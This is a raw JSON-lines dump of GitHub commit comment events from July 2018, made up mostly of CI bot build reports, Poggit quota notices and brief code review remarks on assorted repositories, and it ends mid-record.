{"id":"7941190288","type":"CommitCommentEvent","actor":{"login":"shineedaybyday"},"repo":{"name":"sky068/Puzzles"},"payload":{"comment":{"id":29650424,"position":null,"line":null,"path":null,"commit_id":"9cc53a26a3346f161f2d1d549c0fe3d942cba487","created_at":"2018-07-10T03:01:31Z","updated_at":"2018-07-10T03:01:31Z","author_association":"NONE","body":"You are prefect! "}},"created_at":"2018-07-10T03:01:31Z"}
{"id":"7941196992","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650436,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-10T03:04:00Z","updated_at":"2018-07-10T03:04:00Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 3 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 301\n * Failed: 327\n\nperformance Test Summary\n * Passed: 1\n * Failed: 16\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-57.47%25-red.png)</a> \n"}},"created_at":"2018-07-10T03:04:00Z"}
{"id":"7941198045","type":"CommitCommentEvent","actor":{"login":"Pezbi"},"repo":{"name":"PeytonShotts/RogueMultiplayer"},"payload":{"comment":{"id":29650437,"position":null,"line":null,"path":null,"commit_id":"68d67cf83bf38a7b85a2b67eeb2d18dee52c213e","created_at":"2018-07-10T03:04:22Z","updated_at":"2018-07-10T03:04:22Z","author_association":"NONE","body":"gay"}},"created_at":"2018-07-10T03:04:22Z"}
{"id":"7941201412","type":"CommitCommentEvent","actor":{"login":"mariusmotea"},"repo":{"name":"mariusmotea/diyHue"},"payload":{"comment":{"id":29650447,"position":null,"line":null,"path":null,"commit_id":"b635eaaf2fa1cf0c643fdf4365f7cf876363cb17","created_at":"2018-07-10T03:05:26Z","updated_at":"2018-07-10T03:05:26Z","author_association":"OWNER","body":"Yes, ia a mistake"}},"created_at":"2018-07-10T03:05:26Z"}
{"id":"7941203515","type":"CommitCommentEvent","actor":{"login":"parasolzhang"},"repo":{"name":"parasolzhang/token-profile"},"payload":{"comment":{"id":29650450,"position":null,"line":null,"path":null,"commit_id":"701fbd4f90148b1864ac14c0e5deb7e56ba91e0b","created_at":"2018-07-10T03:06:14Z","updated_at":"2018-07-10T03:06:14Z","author_association":"OWNER","body":"add jtc"}},"created_at":"2018-07-10T03:06:14Z"}
{"id":"7941204739","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/DustBin-PMMP"},"payload":{"comment":{"id":29650451,"position":null,"line":null,"path":null,"commit_id":"ce83118721ff022a36070909e81b03d3acbb451d","created_at":"2018-07-10T03:06:43Z","updated_at":"2018-07-10T03:06:43Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/DustBin-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `44947f1e-83ee-11e8-98e8-b8342621f40c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:06:43Z"}
{"id":"7941205031","type":"CommitCommentEvent","actor":{"login":"brount"},"repo":{"name":"brount/gitTest"},"payload":{"comment":{"id":29650453,"position":null,"line":null,"path":null,"commit_id":"6bb655e9ed4d84749381a9715d7014c81af8a5db","created_at":"2018-07-10T03:06:51Z","updated_at":"2018-07-10T03:06:51Z","author_association":"OWNER","body":"아니 누가 건드렷어"}},"created_at":"2018-07-10T03:06:51Z"}
{"id":"7941208405","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650458,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T03:08:05Z","updated_at":"2018-07-10T03:08:05Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2785 of 2932 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 133 tests had: EIO diffs.\n * 131 tests had: Table big diffs.\n * 5 tests had: ESO small diffs.\n * 3 tests had: MTR small diffs.\n * 16 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 4 tests had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 609\n * Failed: 16\n\nregression Test Summary\n * Passed: 492\n * Failed: 131\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T03:08:05Z"}
{"id":"7941208861","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"rohanKanojia/fabric8-jenkins-proxy"},"payload":{"comment":{"id":29650459,"position":19,"line":40,"path":"internal/jenkinsapi/jenkinsapi_test.go","commit_id":"c84d481cbe48d4de1894cd63df7167a4cca07bc9","created_at":"2018-07-10T03:08:15Z","updated_at":"2018-07-10T03:08:15Z","author_association":"NONE","body":"how about splitting a test that contains 3  tests into 3 test functions? \r\n\r\ne.g.\r\n   *  Test_Status\r\n   *  Test_Status_unauthorized\r\n   *  Test_Status_bad_idler\r\n"}},"created_at":"2018-07-10T03:08:15Z"}
{"id":"7941209905","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650460,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-10T03:08:38Z","updated_at":"2018-07-10T03:08:38Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T03:08:38Z"}
{"id":"7941211390","type":"CommitCommentEvent","actor":{"login":"pathawks"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":29650463,"position":6,"line":72,"path":"History.markdown","commit_id":"5950a7c11370b5af3cea52a745053febf26bef0a","created_at":"2018-07-10T03:09:13Z","updated_at":"2018-07-10T03:09:13Z","author_association":"MEMBER","body":"I think this _is_ a bug fix, but this *must* not be backported to 3.x"}},"created_at":"2018-07-10T03:09:13Z"}
{"id":"7941213727","type":"CommitCommentEvent","actor":{"login":"zixia"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29650468,"position":null,"line":null,"path":null,"commit_id":"e7b14032bca8b78e7b564543491859906770a7d0","created_at":"2018-07-10T03:10:06Z","updated_at":"2018-07-10T03:10:06Z","author_association":"MEMBER","body":"Yes I forgot that, thanks for the reminder, could you please fix it by submit a PR? Because I'm currently on mobile phone."}},"created_at":"2018-07-10T03:10:06Z"}
{"id":"7941224757","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"rohanKanojia/fabric8-jenkins-proxy"},"payload":{"comment":{"id":29650496,"position":45,"line":66,"path":"internal/jenkinsapi/jenkinsapi_test.go","commit_id":"c84d481cbe48d4de1894cd63df7167a4cca07bc9","created_at":"2018-07-10T03:14:24Z","updated_at":"2018-07-10T03:14:24Z","author_association":"NONE","body":"`setupDependencyService(false)` gives an impression that it should not setup dependency services. This is a good example of a classic boolean trap - https://ariya.io/2011/08/hall-of-api-shame-boolean-trap. It may be better to create 2 methods\r\n1. setupDependencies()\r\n1. setupBadDependencies()\r\n\r\nor \r\n\r\n\r\naccept an enum - say `setupDependencies(normal)` and  ` setupDependencies(failing) `"}},"created_at":"2018-07-10T03:14:24Z"}
{"id":"7941230759","type":"CommitCommentEvent","actor":{"login":"natcha1983"},"repo":{"name":"google/brotli"},"payload":{"comment":{"id":29650504,"position":null,"line":null,"path":null,"commit_id":"bc541f74e11af3ae36606d7439c99c62c80afa0c","created_at":"2018-07-10T03:16:36Z","updated_at":"2018-07-10T03:16:36Z","author_association":"NONE","body":"![e9062f4c-a215-4859-b5fe-3c1d97bbea72](https://user-images.githubusercontent.com/40970264/42487240-4f52d57c-842a-11e8-9bb9-6643f8cc84d8.png)\r\n"}},"created_at":"2018-07-10T03:16:36Z"}
{"id":"7941232360","type":"CommitCommentEvent","actor":{"login":"pasupureddy"},"repo":{"name":"pasupureddy/devops7"},"payload":{"comment":{"id":29650506,"position":null,"line":null,"path":null,"commit_id":"fe6b5532b22ab8dc92bdbbd798bb749bbb066b20","created_at":"2018-07-10T03:17:16Z","updated_at":"2018-07-10T03:17:16Z","author_association":"OWNER","body":"roll back the changes during the bug fix"}},"created_at":"2018-07-10T03:17:16Z"}
{"id":"7941232796","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650507,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-10T03:17:27Z","updated_at":"2018-07-10T03:17:27Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.36%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-10T03:17:27Z"}
{"id":"7941233018","type":"CommitCommentEvent","actor":{"login":"deanmorin"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29650508,"position":null,"line":null,"path":null,"commit_id":"77d919d10721f1ec24875219228b21ae2d203987","created_at":"2018-07-10T03:17:32Z","updated_at":"2018-07-10T03:17:32Z","author_association":"NONE","body":"`nvim-completion-manager` has been fantastic, great to see that you're working on another version!"}},"created_at":"2018-07-10T03:17:32Z"}
{"id":"7941235687","type":"CommitCommentEvent","actor":{"login":"beareye"},"repo":{"name":"KnowledgeCaptureAndDiscovery/ASSET"},"payload":{"comment":{"id":29650515,"position":null,"line":null,"path":null,"commit_id":"15401417ea1e9caadc8be636c1361a2738336c8b","created_at":"2018-07-10T03:18:33Z","updated_at":"2018-07-10T03:18:33Z","author_association":"CONTRIBUTOR","body":"commit 649df2f9c23c5b25270c3943d7b898d0feb11ac5\r\n"}},"created_at":"2018-07-10T03:18:33Z"}
{"id":"7941242084","type":"CommitCommentEvent","actor":{"login":"derbedhruv"},"repo":{"name":"derbedhruv/fpm"},"payload":{"comment":{"id":29650519,"position":null,"line":null,"path":null,"commit_id":"0d78cc146db8aeab6bc8f7ab3cc77015a2d990da","created_at":"2018-07-10T03:20:48Z","updated_at":"2018-07-10T03:20:48Z","author_association":"OWNER","body":"@cmlili please check out the latest [imageit.m](https://github.com/derbedhruv/fpm/blob/master/imageit.m) - you will see that 2*pupil_radius is used. This is a random older commit and it was too long ago so it's confusing to understand through this."}},"created_at":"2018-07-10T03:20:48Z"}
{"id":"7941244167","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29650521,"position":null,"line":null,"path":null,"commit_id":"4e9a2194be2c3a3e382999d990586cb80d4b07a2","created_at":"2018-07-10T03:21:31Z","updated_at":"2018-07-10T03:21:31Z","author_association":"NONE","body":"Puzzle `208-1962a091` disappeared from [`src/test/java/org/llorllale/youtrack/api/XmlAttachmentIT.java`](https://github.com/llorllale/youtrack-api/blob/master/src/test/java/org/llorllale/youtrack/api/XmlAttachmentIT.java), that's why I closed #217. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T03:21:31Z"}
{"id":"7941246192","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/HotBox-PMMP"},"payload":{"comment":{"id":29650523,"position":null,"line":null,"path":null,"commit_id":"f432dfd60c84dd241cadc1b4dec79d595ad509bf","created_at":"2018-07-10T03:22:15Z","updated_at":"2018-07-10T03:22:15Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/HotBox-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `7005beea-83f0-11e8-9863-03e9769da5b7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:22:15Z"}
{"id":"7941263551","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/HotBox-PMMP"},"payload":{"comment":{"id":29650543,"position":null,"line":null,"path":null,"commit_id":"be072a26aca72bf41aaaaedf4e99be44a8db0613","created_at":"2018-07-10T03:28:31Z","updated_at":"2018-07-10T03:28:31Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/HotBox-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `507385d4-83f1-11e8-9b3c-c4ea9ec41779`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:28:31Z"}
{"id":"7941263917","type":"CommitCommentEvent","actor":{"login":"GustavoDomingueti"},"repo":{"name":"GustavoDomingueti/babel-es2015-async-await-functions"},"payload":{"comment":{"id":29650544,"position":null,"line":null,"path":null,"commit_id":"95f52b24289308d276e3558ddd8b400d511fd5fa","created_at":"2018-07-10T03:28:40Z","updated_at":"2018-07-10T03:28:40Z","author_association":"OWNER","body":"Create repository: transpile - babel-es2015-async-await-functions"}},"created_at":"2018-07-10T03:28:40Z"}
{"id":"7941264867","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/DustBin-PMMP"},"payload":{"comment":{"id":29650550,"position":null,"line":null,"path":null,"commit_id":"afc13deadda3e2eee6365b72b4e7f4d24d5736d4","created_at":"2018-07-10T03:29:04Z","updated_at":"2018-07-10T03:29:04Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/DustBin-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `63692568-83f1-11e8-9274-db881702472e`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:29:04Z"}
{"id":"7941265289","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/ChunkLoader-PMMP"},"payload":{"comment":{"id":29650551,"position":null,"line":null,"path":null,"commit_id":"569a1b1c3576735dfae1e84d587ad582f082a293","created_at":"2018-07-10T03:29:13Z","updated_at":"2018-07-10T03:29:13Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/ChunkLoader-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6933df9c-83f1-11e8-92ee-d9ff8a4a29c7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:29:13Z"}
{"id":"7941265473","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/WriteCheck-PMMP"},"payload":{"comment":{"id":29650552,"position":null,"line":null,"path":null,"commit_id":"2378596fb83ef9eaa51c2dbe7fa89fdce699a50f","created_at":"2018-07-10T03:29:17Z","updated_at":"2018-07-10T03:29:17Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/WriteCheck-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6b7db0fc-83f1-11e8-88df-9f6e49601ef7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T03:29:17Z"}
{"id":"7941285145","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29650576,"position":70,"line":64,"path":"src/Umbraco.Web.UI.Client/src/views/components/content/umb-content-node-info.html","commit_id":"9c8d73dcfa1586d8d82a89914de47cfb20774d24","created_at":"2018-07-10T03:36:42Z","updated_at":"2018-07-10T03:36:42Z","author_association":"MEMBER","body":"Should we just remove this line, is there any reason to leave this commented out? "}},"created_at":"2018-07-10T03:36:42Z"}
{"id":"7941285421","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29650580,"position":78,"line":71,"path":"src/Umbraco.Web.UI.Client/src/views/components/content/umb-content-node-info.html","commit_id":"9c8d73dcfa1586d8d82a89914de47cfb20774d24","created_at":"2018-07-10T03:36:48Z","updated_at":"2018-07-10T03:36:48Z","author_association":"MEMBER","body":"Should we just remove this line, is there any reason to leave this commented out? "}},"created_at":"2018-07-10T03:36:48Z"}
{"id":"7941287590","type":"CommitCommentEvent","actor":{"login":"levanquang15081998"},"repo":{"name":"DinhThanhNghia/Front-End"},"payload":{"comment":{"id":29650583,"position":null,"line":null,"path":null,"commit_id":"e8c643bc24e1c540b5f475ef1a29ca200a3b65f0","created_at":"2018-07-10T03:37:40Z","updated_at":"2018-07-10T03:37:40Z","author_association":"NONE","body":"cccc\r\n"}},"created_at":"2018-07-10T03:37:40Z"}
{"id":"7941287906","type":"CommitCommentEvent","actor":{"login":"wangmianm"},"repo":{"name":"wangmianm/wangmianmian"},"payload":{"comment":{"id":29650584,"position":null,"line":null,"path":null,"commit_id":"425c407c65b03e5749c5ab26c50f98646fd65ba3","created_at":"2018-07-10T03:37:48Z","updated_at":"2018-07-10T03:37:48Z","author_association":"OWNER","body":"弱智小游戏"}},"created_at":"2018-07-10T03:37:48Z"}
{"id":"7941288139","type":"CommitCommentEvent","actor":{"login":"levanquang15081998"},"repo":{"name":"DinhThanhNghia/Front-End"},"payload":{"comment":{"id":29650586,"position":null,"line":null,"path":null,"commit_id":"e8c643bc24e1c540b5f475ef1a29ca200a3b65f0","created_at":"2018-07-10T03:37:54Z","updated_at":"2018-07-10T03:37:54Z","author_association":"NONE","body":"sữa ccc\r\n"}},"created_at":"2018-07-10T03:37:54Z"}
{"id":"7941291572","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18021/programming-term2"},"payload":{"comment":{"id":29650595,"position":null,"line":null,"path":null,"commit_id":"2e2c277afc33185f3b03791a89c9b422f2555d2b","created_at":"2018-07-10T03:39:16Z","updated_at":"2018-07-10T03:39:16Z","author_association":"NONE","body":"修正ありがとうございます!パーフェクトですね!\r\n一度おつまみの数を画面入力しようとした履歴がありますね。\r\nこういうことをすると変数の使い方かより分かるのではないかと思います。いい実験ですね。"}},"created_at":"2018-07-10T03:39:16Z"}
{"id":"7941294917","type":"CommitCommentEvent","actor":{"login":"yj3211kim"},"repo":{"name":"cloud-pi/minio"},"payload":{"comment":{"id":29650603,"position":null,"line":null,"path":null,"commit_id":"b77b3ae628bc6cc240bbd3d69b79dc3529da2cdb","created_at":"2018-07-10T03:40:35Z","updated_at":"2018-07-10T03:40:35Z","author_association":"NONE","body":"https://drive.google.com/open?id=1L0RI-LGs3WvBpUUZrwRiXWteVYr_fvuC"}},"created_at":"2018-07-10T03:40:35Z"}
{"id":"7941295317","type":"CommitCommentEvent","actor":{"login":"Tongzhiyong233"},"repo":{"name":"Tongzhiyong233/tzyFirst"},"payload":{"comment":{"id":29650606,"position":1,"line":1,"path":"gittest.txt","commit_id":"92fdb99a8ec13e2687c2663ce7c5b6f07f906185","created_at":"2018-07-10T03:40:46Z","updated_at":"2018-07-10T03:40:46Z","author_association":"OWNER","body":"add\r\n"}},"created_at":"2018-07-10T03:40:46Z"}
{"id":"7941296407","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29650609,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T03:41:12Z","updated_at":"2018-07-10T03:41:12Z","author_association":"CONTRIBUTOR","body":"I just got to look at this, and I see the motivation.  However, the implementation fails if the environment in which it runs supports THREAD_ABORT, but does not support Thread.ResetAbort, which is the case in CF.\r\n\r\nThere is a very simple, and fully compatible, fix for this, which requires no conditionals.\r\n\r\n```\r\n\t\t\ttry\r\n\t\t\t\t{\r\n\t\t\t\tRunTestMethodInThreadAbortSafeZone (context, () =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\tBeforeTest (context);\r\n\r\n\t\t\t\t\tcontext.CurrentResult = innerCommand.Execute (context);\r\n\t\t\t\t\t});\r\n\t\t\t\t}\r\n\t\t\tfinally\r\n\t\t\t\t{\r\n\t\t\t\tif (context.ExecutionStatus != TestExecutionStatus.AbortRequested)\r\n\t\t\t\t\tRunTestMethodInThreadAbortSafeZone (context, () => { AfterTest (context); });\r\n\t\t\t\t}\r\n```\r\n\r\nSince this is platform neutral, it might be a good change to make.  I have fixed it on my build, but just thought I would note this for the general case."}},"created_at":"2018-07-10T03:41:12Z"}
{"id":"7941296543","type":"CommitCommentEvent","actor":{"login":"GustavoDomingueti"},"repo":{"name":"GustavoDomingueti/babel-async-await-functions"},"payload":{"comment":{"id":29650610,"position":null,"line":null,"path":null,"commit_id":"7c9814f5f215a095ef03ac6739406de1f6d9d02c","created_at":"2018-07-10T03:41:15Z","updated_at":"2018-07-10T03:41:15Z","author_association":"OWNER","body":"Create repository ---> babel-async-await-functions"}},"created_at":"2018-07-10T03:41:15Z"}
{"id":"7941300044","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29650611,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T03:42:33Z","updated_at":"2018-07-10T03:42:33Z","author_association":"CONTRIBUTOR","body":"BTW, In my CF build Thread.ResetAbort is an extension method to the Thread class which does nothing, so all the other related code in the build just works."}},"created_at":"2018-07-10T03:42:33Z"}
{"id":"7941300224","type":"CommitCommentEvent","actor":{"login":"bugLordFPT"},"repo":{"name":"zenzenkakkoii/hello_Work"},"payload":{"comment":{"id":29650612,"position":4,"line":7,"path":"demo","commit_id":"fb695a9c821e092c4ceed8cd5470b116694af3ba","created_at":"2018-07-10T03:42:38Z","updated_at":"2018-07-10T03:42:38Z","author_association":"NONE","body":"dfgh\r\n"}},"created_at":"2018-07-10T03:42:38Z"}
{"id":"7941302078","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29650614,"position":null,"line":null,"path":null,"commit_id":"c0f02d4e1f9da6fa3c3121a9e21fee95a3ce7407","created_at":"2018-07-10T03:43:22Z","updated_at":"2018-07-10T03:43:22Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180709-4-ayruvy/llorllale/youtrack-api && pdd -v -f /tmp/20180710-32539-12orxgy [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180709-4-ayruvy/llorllale/youtrack-api + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180709-4-ayruvy/llorllale/youtrack-api && pdd -v -f /tmp/20180710-32539-12orxgy [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180709-4-ayruvy/llorllale/youtrack-api\n+ pdd -v -f /tmp/20180710-32539-12orxgy\n\nFound 10 